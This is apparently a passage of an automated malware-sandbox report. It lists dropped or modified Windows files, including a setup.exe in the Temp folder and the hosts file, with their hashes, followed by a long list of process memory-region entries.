                                                84e0dc44ae3eadf6d31484119294126f5a056add94733fea2ba5597b6a302fc107117f5c5029d4ce0ff8e5c859c4de9c456aa5f01d420f25a3d56dc569801ff1

                                              • C:\Windows\Temp\setup.exe
                                                Filesize

                                                7.2MB

                                                MD5

                                                0b73b8642974b78eabef49340a4dbf45

                                                SHA1

                                                461472cf0e9e83b820f6cf878bd5e60405312756

                                                SHA256

                                                8e78264920b7a4891dad9c128845267b5f9a99ffed99d97518899a7ed1072084

                                                SHA512

                                                1b8d6b68e2e0bf49dcd187e3e7845858cedd3c19679085be903c6b60291acd1aa491aff3aa9130247d3bb5cd403949e9c9731068f2ebd50bafd6bfc9f1cf534b

                                              • C:\Windows\Temp\setup.exe
                                                Filesize

                                                7.2MB

                                                MD5

                                                0b73b8642974b78eabef49340a4dbf45

                                                SHA1

                                                461472cf0e9e83b820f6cf878bd5e60405312756

                                                SHA256

                                                8e78264920b7a4891dad9c128845267b5f9a99ffed99d97518899a7ed1072084

                                                SHA512

                                                1b8d6b68e2e0bf49dcd187e3e7845858cedd3c19679085be903c6b60291acd1aa491aff3aa9130247d3bb5cd403949e9c9731068f2ebd50bafd6bfc9f1cf534b

                                              • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log
                                                Filesize

                                                539B

                                                MD5

                                                84f2160705ac9a032c002f966498ef74

                                                SHA1

                                                e9f3db2e1ad24a4f7e5c203af03bbc07235e704c

                                                SHA256

                                                7840ca7ea27e8a24ebc4877774be6013ab4f81d1eb83c121e4c3290ceb532d93

                                                SHA512

                                                f41c289770d8817ee612e53880d3f6492d50d08fb5104bf76440c2a93539dd25f6f15179b318e67b9202aabbe802941f80ac2dbadfd6ff1081b0d37c33f9da57

                                              • C:\Windows\system32\drivers\etc\hosts
                                                Filesize

                                                1KB

                                                MD5

                                                f3f6968a4c0f457f427eb17f7cc5f68b

                                                SHA1

                                                872933578f4b7d555158189ed02015f192daa7c6

                                                SHA256

                                                774ad8ef51d495bfec8b3e3d058210d5ce715c66f76008f1e4f2b6203d33e41c

                                                SHA512

                                                5dafd8fb0cae325865c0a897e3719250903ac5da72b0fa5006ebda505ee625cd9eacf09c5043c3b3648a5677e96c87f1f2995712471cd1539cd9c73a7e3d0d49

                                              • memory/520-571-0x0000000000000000-mapping.dmp
                                              • memory/864-341-0x0000000000000000-mapping.dmp
                                              • memory/1020-344-0x0000000000000000-mapping.dmp
                                              • memory/1388-568-0x0000000000000000-mapping.dmp
                                              • memory/1400-185-0x0000000000000000-mapping.dmp
                                              • memory/1536-558-0x0000000000000000-mapping.dmp
                                              • memory/1920-354-0x0000000000000000-mapping.dmp
                                              • memory/2056-559-0x0000000000000000-mapping.dmp
                                              • memory/2072-347-0x0000000000000000-mapping.dmp
                                              • memory/2116-352-0x0000000000000000-mapping.dmp
                                              • memory/2148-345-0x0000000000000000-mapping.dmp
                                              • memory/2212-186-0x0000000000000000-mapping.dmp
                                              • memory/2308-169-0x0000000077920000-0x0000000077AAE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2308-180-0x0000000077920000-0x0000000077AAE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2308-135-0x0000000077920000-0x0000000077AAE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2308-136-0x0000000077920000-0x0000000077AAE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2308-137-0x0000000077920000-0x0000000077AAE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2308-138-0x0000000077920000-0x0000000077AAE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2308-139-0x0000000077920000-0x0000000077AAE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2308-140-0x0000000077920000-0x0000000077AAE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2308-141-0x0000000077920000-0x0000000077AAE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2308-142-0x0000000077920000-0x0000000077AAE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2308-143-0x0000000077920000-0x0000000077AAE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2308-144-0x0000000077920000-0x0000000077AAE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2308-145-0x0000000077920000-0x0000000077AAE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2308-146-0x0000000077920000-0x0000000077AAE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2308-147-0x0000000077920000-0x0000000077AAE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2308-148-0x0000000077920000-0x0000000077AAE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2308-149-0x0000000077920000-0x0000000077AAE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2308-150-0x0000000077920000-0x0000000077AAE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2308-151-0x0000000077920000-0x0000000077AAE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2308-152-0x0000000077920000-0x0000000077AAE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2308-153-0x0000000077920000-0x0000000077AAE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2308-154-0x0000000077920000-0x0000000077AAE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2308-155-0x0000000077920000-0x0000000077AAE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2308-156-0x0000000077920000-0x0000000077AAE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2308-157-0x0000000077920000-0x0000000077AAE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2308-158-0x0000000077920000-0x0000000077AAE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2308-159-0x0000000077920000-0x0000000077AAE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2308-160-0x0000000077920000-0x0000000077AAE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2308-161-0x0000000077920000-0x0000000077AAE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2308-162-0x0000000077920000-0x0000000077AAE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2308-163-0x0000000077920000-0x0000000077AAE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2308-164-0x0000000077920000-0x0000000077AAE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2308-165-0x0000000077920000-0x0000000077AAE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2308-166-0x0000000077920000-0x0000000077AAE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2308-167-0x0000000077920000-0x0000000077AAE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2308-168-0x0000000077920000-0x0000000077AAE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2308-118-0x0000000077920000-0x0000000077AAE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2308-170-0x0000000077920000-0x0000000077AAE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2308-171-0x0000000077920000-0x0000000077AAE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2308-172-0x0000000077920000-0x0000000077AAE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2308-173-0x0000000077920000-0x0000000077AAE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2308-174-0x0000000077920000-0x0000000077AAE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2308-175-0x0000000077920000-0x0000000077AAE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2308-176-0x0000000077920000-0x0000000077AAE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2308-177-0x0000000077920000-0x0000000077AAE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2308-178-0x0000000077920000-0x0000000077AAE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2308-179-0x0000000077920000-0x0000000077AAE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2308-134-0x0000000077920000-0x0000000077AAE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2308-181-0x0000000077920000-0x0000000077AAE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2308-119-0x0000000077920000-0x0000000077AAE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2308-120-0x0000000077920000-0x0000000077AAE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2308-133-0x0000000077920000-0x0000000077AAE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2308-132-0x0000000077920000-0x0000000077AAE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2308-131-0x0000000077920000-0x0000000077AAE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2308-121-0x0000000077920000-0x0000000077AAE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2308-122-0x0000000077920000-0x0000000077AAE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2308-130-0x0000000077920000-0x0000000077AAE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2308-123-0x0000000077920000-0x0000000077AAE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2308-124-0x0000000077920000-0x0000000077AAE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2308-125-0x0000000077920000-0x0000000077AAE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2308-129-0x0000000077920000-0x0000000077AAE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2308-126-0x0000000077920000-0x0000000077AAE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2308-128-0x0000000077920000-0x0000000077AAE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2308-127-0x0000000077920000-0x0000000077AAE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2328-536-0x0000000000000000-mapping.dmp
                                              • memory/2328-355-0x0000000000000000-mapping.dmp
                                              • memory/2508-534-0x0000000000000000-mapping.dmp
                                              • memory/2556-387-0x0000000000000000-mapping.dmp
                                              • memory/2556-402-0x0000027A6F760000-0x0000027A6F77C000-memory.dmp
                                                Filesize

                                                112KB

                                              • memory/2556-408-0x0000027A6FD20000-0x0000027A6FDD9000-memory.dmp
                                                Filesize

                                                740KB

                                              • memory/2556-441-0x0000027A6F780000-0x0000027A6F78A000-memory.dmp
                                                Filesize

                                                40KB

                                              • memory/2580-556-0x0000000000000000-mapping.dmp
                                              • memory/2584-386-0x0000000000000000-mapping.dmp
                                              • memory/2588-364-0x0000000000000000-mapping.dmp
                                              • memory/2608-346-0x0000000000000000-mapping.dmp
                                              • memory/2852-349-0x0000000000000000-mapping.dmp
                                              • memory/2856-582-0x0000027901750000-0x0000027901757000-memory.dmp
                                                Filesize

                                                28KB

                                              • memory/2856-580-0x0000027901910000-0x0000027901916000-memory.dmp
                                                Filesize

                                                24KB

                                              • memory/2944-350-0x0000000000000000-mapping.dmp
                                              • memory/3172-569-0x0000000000000000-mapping.dmp
                                              • memory/3316-555-0x0000000000000000-mapping.dmp
                                              • memory/3536-557-0x0000000000000000-mapping.dmp
                                              • memory/3584-336-0x0000000000000000-mapping.dmp
                                              • memory/3680-340-0x0000000000000000-mapping.dmp
                                              • memory/3684-351-0x0000000000000000-mapping.dmp
                                              • memory/3760-560-0x0000000000000000-mapping.dmp
                                              • memory/3828-348-0x0000000000000000-mapping.dmp
                                              • memory/3940-290-0x000002A925B20000-0x000002A925F3C000-memory.dmp
                                                Filesize

                                                4.1MB

                                              • memory/3940-288-0x000002A90ABB0000-0x000002A90AFCC000-memory.dmp
                                                Filesize

                                                4.1MB

                                              • memory/4172-570-0x0000000000000000-mapping.dmp
                                              • memory/4260-367-0x0000000000000000-mapping.dmp
                                              • memory/4280-363-0x0000000000000000-mapping.dmp
                                              • memory/4304-297-0x0000000000000000-mapping.dmp
                                              • memory/4312-365-0x0000000000000000-mapping.dmp
                                              • memory/4328-298-0x0000000000000000-mapping.dmp
                                              • memory/4328-306-0x00000214C7330000-0x00000214C73A6000-memory.dmp
                                                Filesize

                                                472KB

                                              • memory/4328-303-0x00000214C7180000-0x00000214C71A2000-memory.dmp
                                                Filesize

                                                136KB

                                              • memory/4328-551-0x0000000000000000-mapping.dmp
                                              • memory/4340-533-0x0000000000000000-mapping.dmp
                                              • memory/4356-361-0x0000000000000000-mapping.dmp
                                              • memory/4376-372-0x00007FF948340000-0x00007FF94851B000-memory.dmp
                                                Filesize

                                                1.9MB

                                              • memory/4376-375-0x0000000000400000-0x000000000106C000-memory.dmp
                                                Filesize

                                                12.4MB

                                              • memory/4376-378-0x00007FF948340000-0x00007FF94851B000-memory.dmp
                                                Filesize

                                                1.9MB

                                              • memory/4376-373-0x0000000000400000-0x000000000106C000-memory.dmp
                                                Filesize

                                                12.4MB

                                              • memory/4376-371-0x0000000000400000-0x000000000106C000-memory.dmp
                                                Filesize

                                                12.4MB

                                              • memory/4396-353-0x0000000000000000-mapping.dmp
                                              • memory/4412-539-0x0000000000000000-mapping.dmp
                                              • memory/4540-538-0x000001F2FFAD0000-0x000001F2FFAD6000-memory.dmp
                                                Filesize

                                                24KB

                                              • memory/4540-550-0x000001F2FFB00000-0x000001F2FFB12000-memory.dmp
                                                Filesize

                                                72KB

                                              • memory/4580-335-0x0000000000000000-mapping.dmp
                                              • memory/4616-362-0x0000000000000000-mapping.dmp
                                              • memory/4640-547-0x0000000000000000-mapping.dmp
                                              • memory/4648-282-0x00007FF948340000-0x00007FF94851B000-memory.dmp
                                                Filesize

                                                1.9MB

                                              • memory/4648-182-0x0000000000000000-mapping.dmp
                                              • memory/4648-198-0x00007FF948340000-0x00007FF94851B000-memory.dmp
                                                Filesize

                                                1.9MB

                                              • memory/4648-196-0x0000000000400000-0x000000000106C000-memory.dmp
                                                Filesize

                                                12.4MB

                                              • memory/4648-285-0x00007FF948340000-0x00007FF94851B000-memory.dmp
                                                Filesize

                                                1.9MB

                                              • memory/4648-283-0x0000000000400000-0x000000000106C000-memory.dmp
                                                Filesize

                                                12.4MB

                                              • memory/4648-281-0x0000000000400000-0x000000000106C000-memory.dmp
                                                Filesize

                                                12.4MB

                                              • memory/4656-357-0x0000000000000000-mapping.dmp
                                              • memory/4664-542-0x0000000000401BEA-mapping.dmp
                                              • memory/4664-574-0x0000000000400000-0x000000000040C000-memory.dmp
                                                Filesize

                                                48KB

                                              • memory/4664-561-0x0000000000400000-0x000000000040C000-memory.dmp
                                                Filesize

                                                48KB

                                              • memory/4668-356-0x0000000000000000-mapping.dmp
                                              • memory/4668-537-0x0000000000000000-mapping.dmp
                                              • memory/4748-572-0x0000000140000000-0x0000000140803000-memory.dmp
                                                Filesize

                                                8.0MB

                                              • memory/4748-573-0x0000000140000000-0x0000000140803000-memory.dmp
                                                Filesize

                                                8.0MB

                                              • memory/4748-563-0x000000014036DB84-mapping.dmp
                                              • memory/4760-338-0x0000000000000000-mapping.dmp
                                              • memory/4764-554-0x0000000000000000-mapping.dmp
                                              • memory/4852-358-0x0000000000000000-mapping.dmp
                                              • memory/4852-540-0x0000000000000000-mapping.dmp
                                              • memory/4884-359-0x0000000000000000-mapping.dmp
                                              • memory/4884-549-0x0000000000000000-mapping.dmp
                                              • memory/4932-360-0x0000000000000000-mapping.dmp
                                              • memory/4932-548-0x0000000000000000-mapping.dmp
                                              • memory/4940-334-0x0000000000000000-mapping.dmp
                                              • memory/4940-552-0x0000000000000000-mapping.dmp
                                              • memory/4968-342-0x0000000000000000-mapping.dmp
                                              • memory/4984-337-0x0000000000000000-mapping.dmp
                                              • memory/5024-343-0x0000000000000000-mapping.dmp
                                              • memory/5040-339-0x0000000000000000-mapping.dmp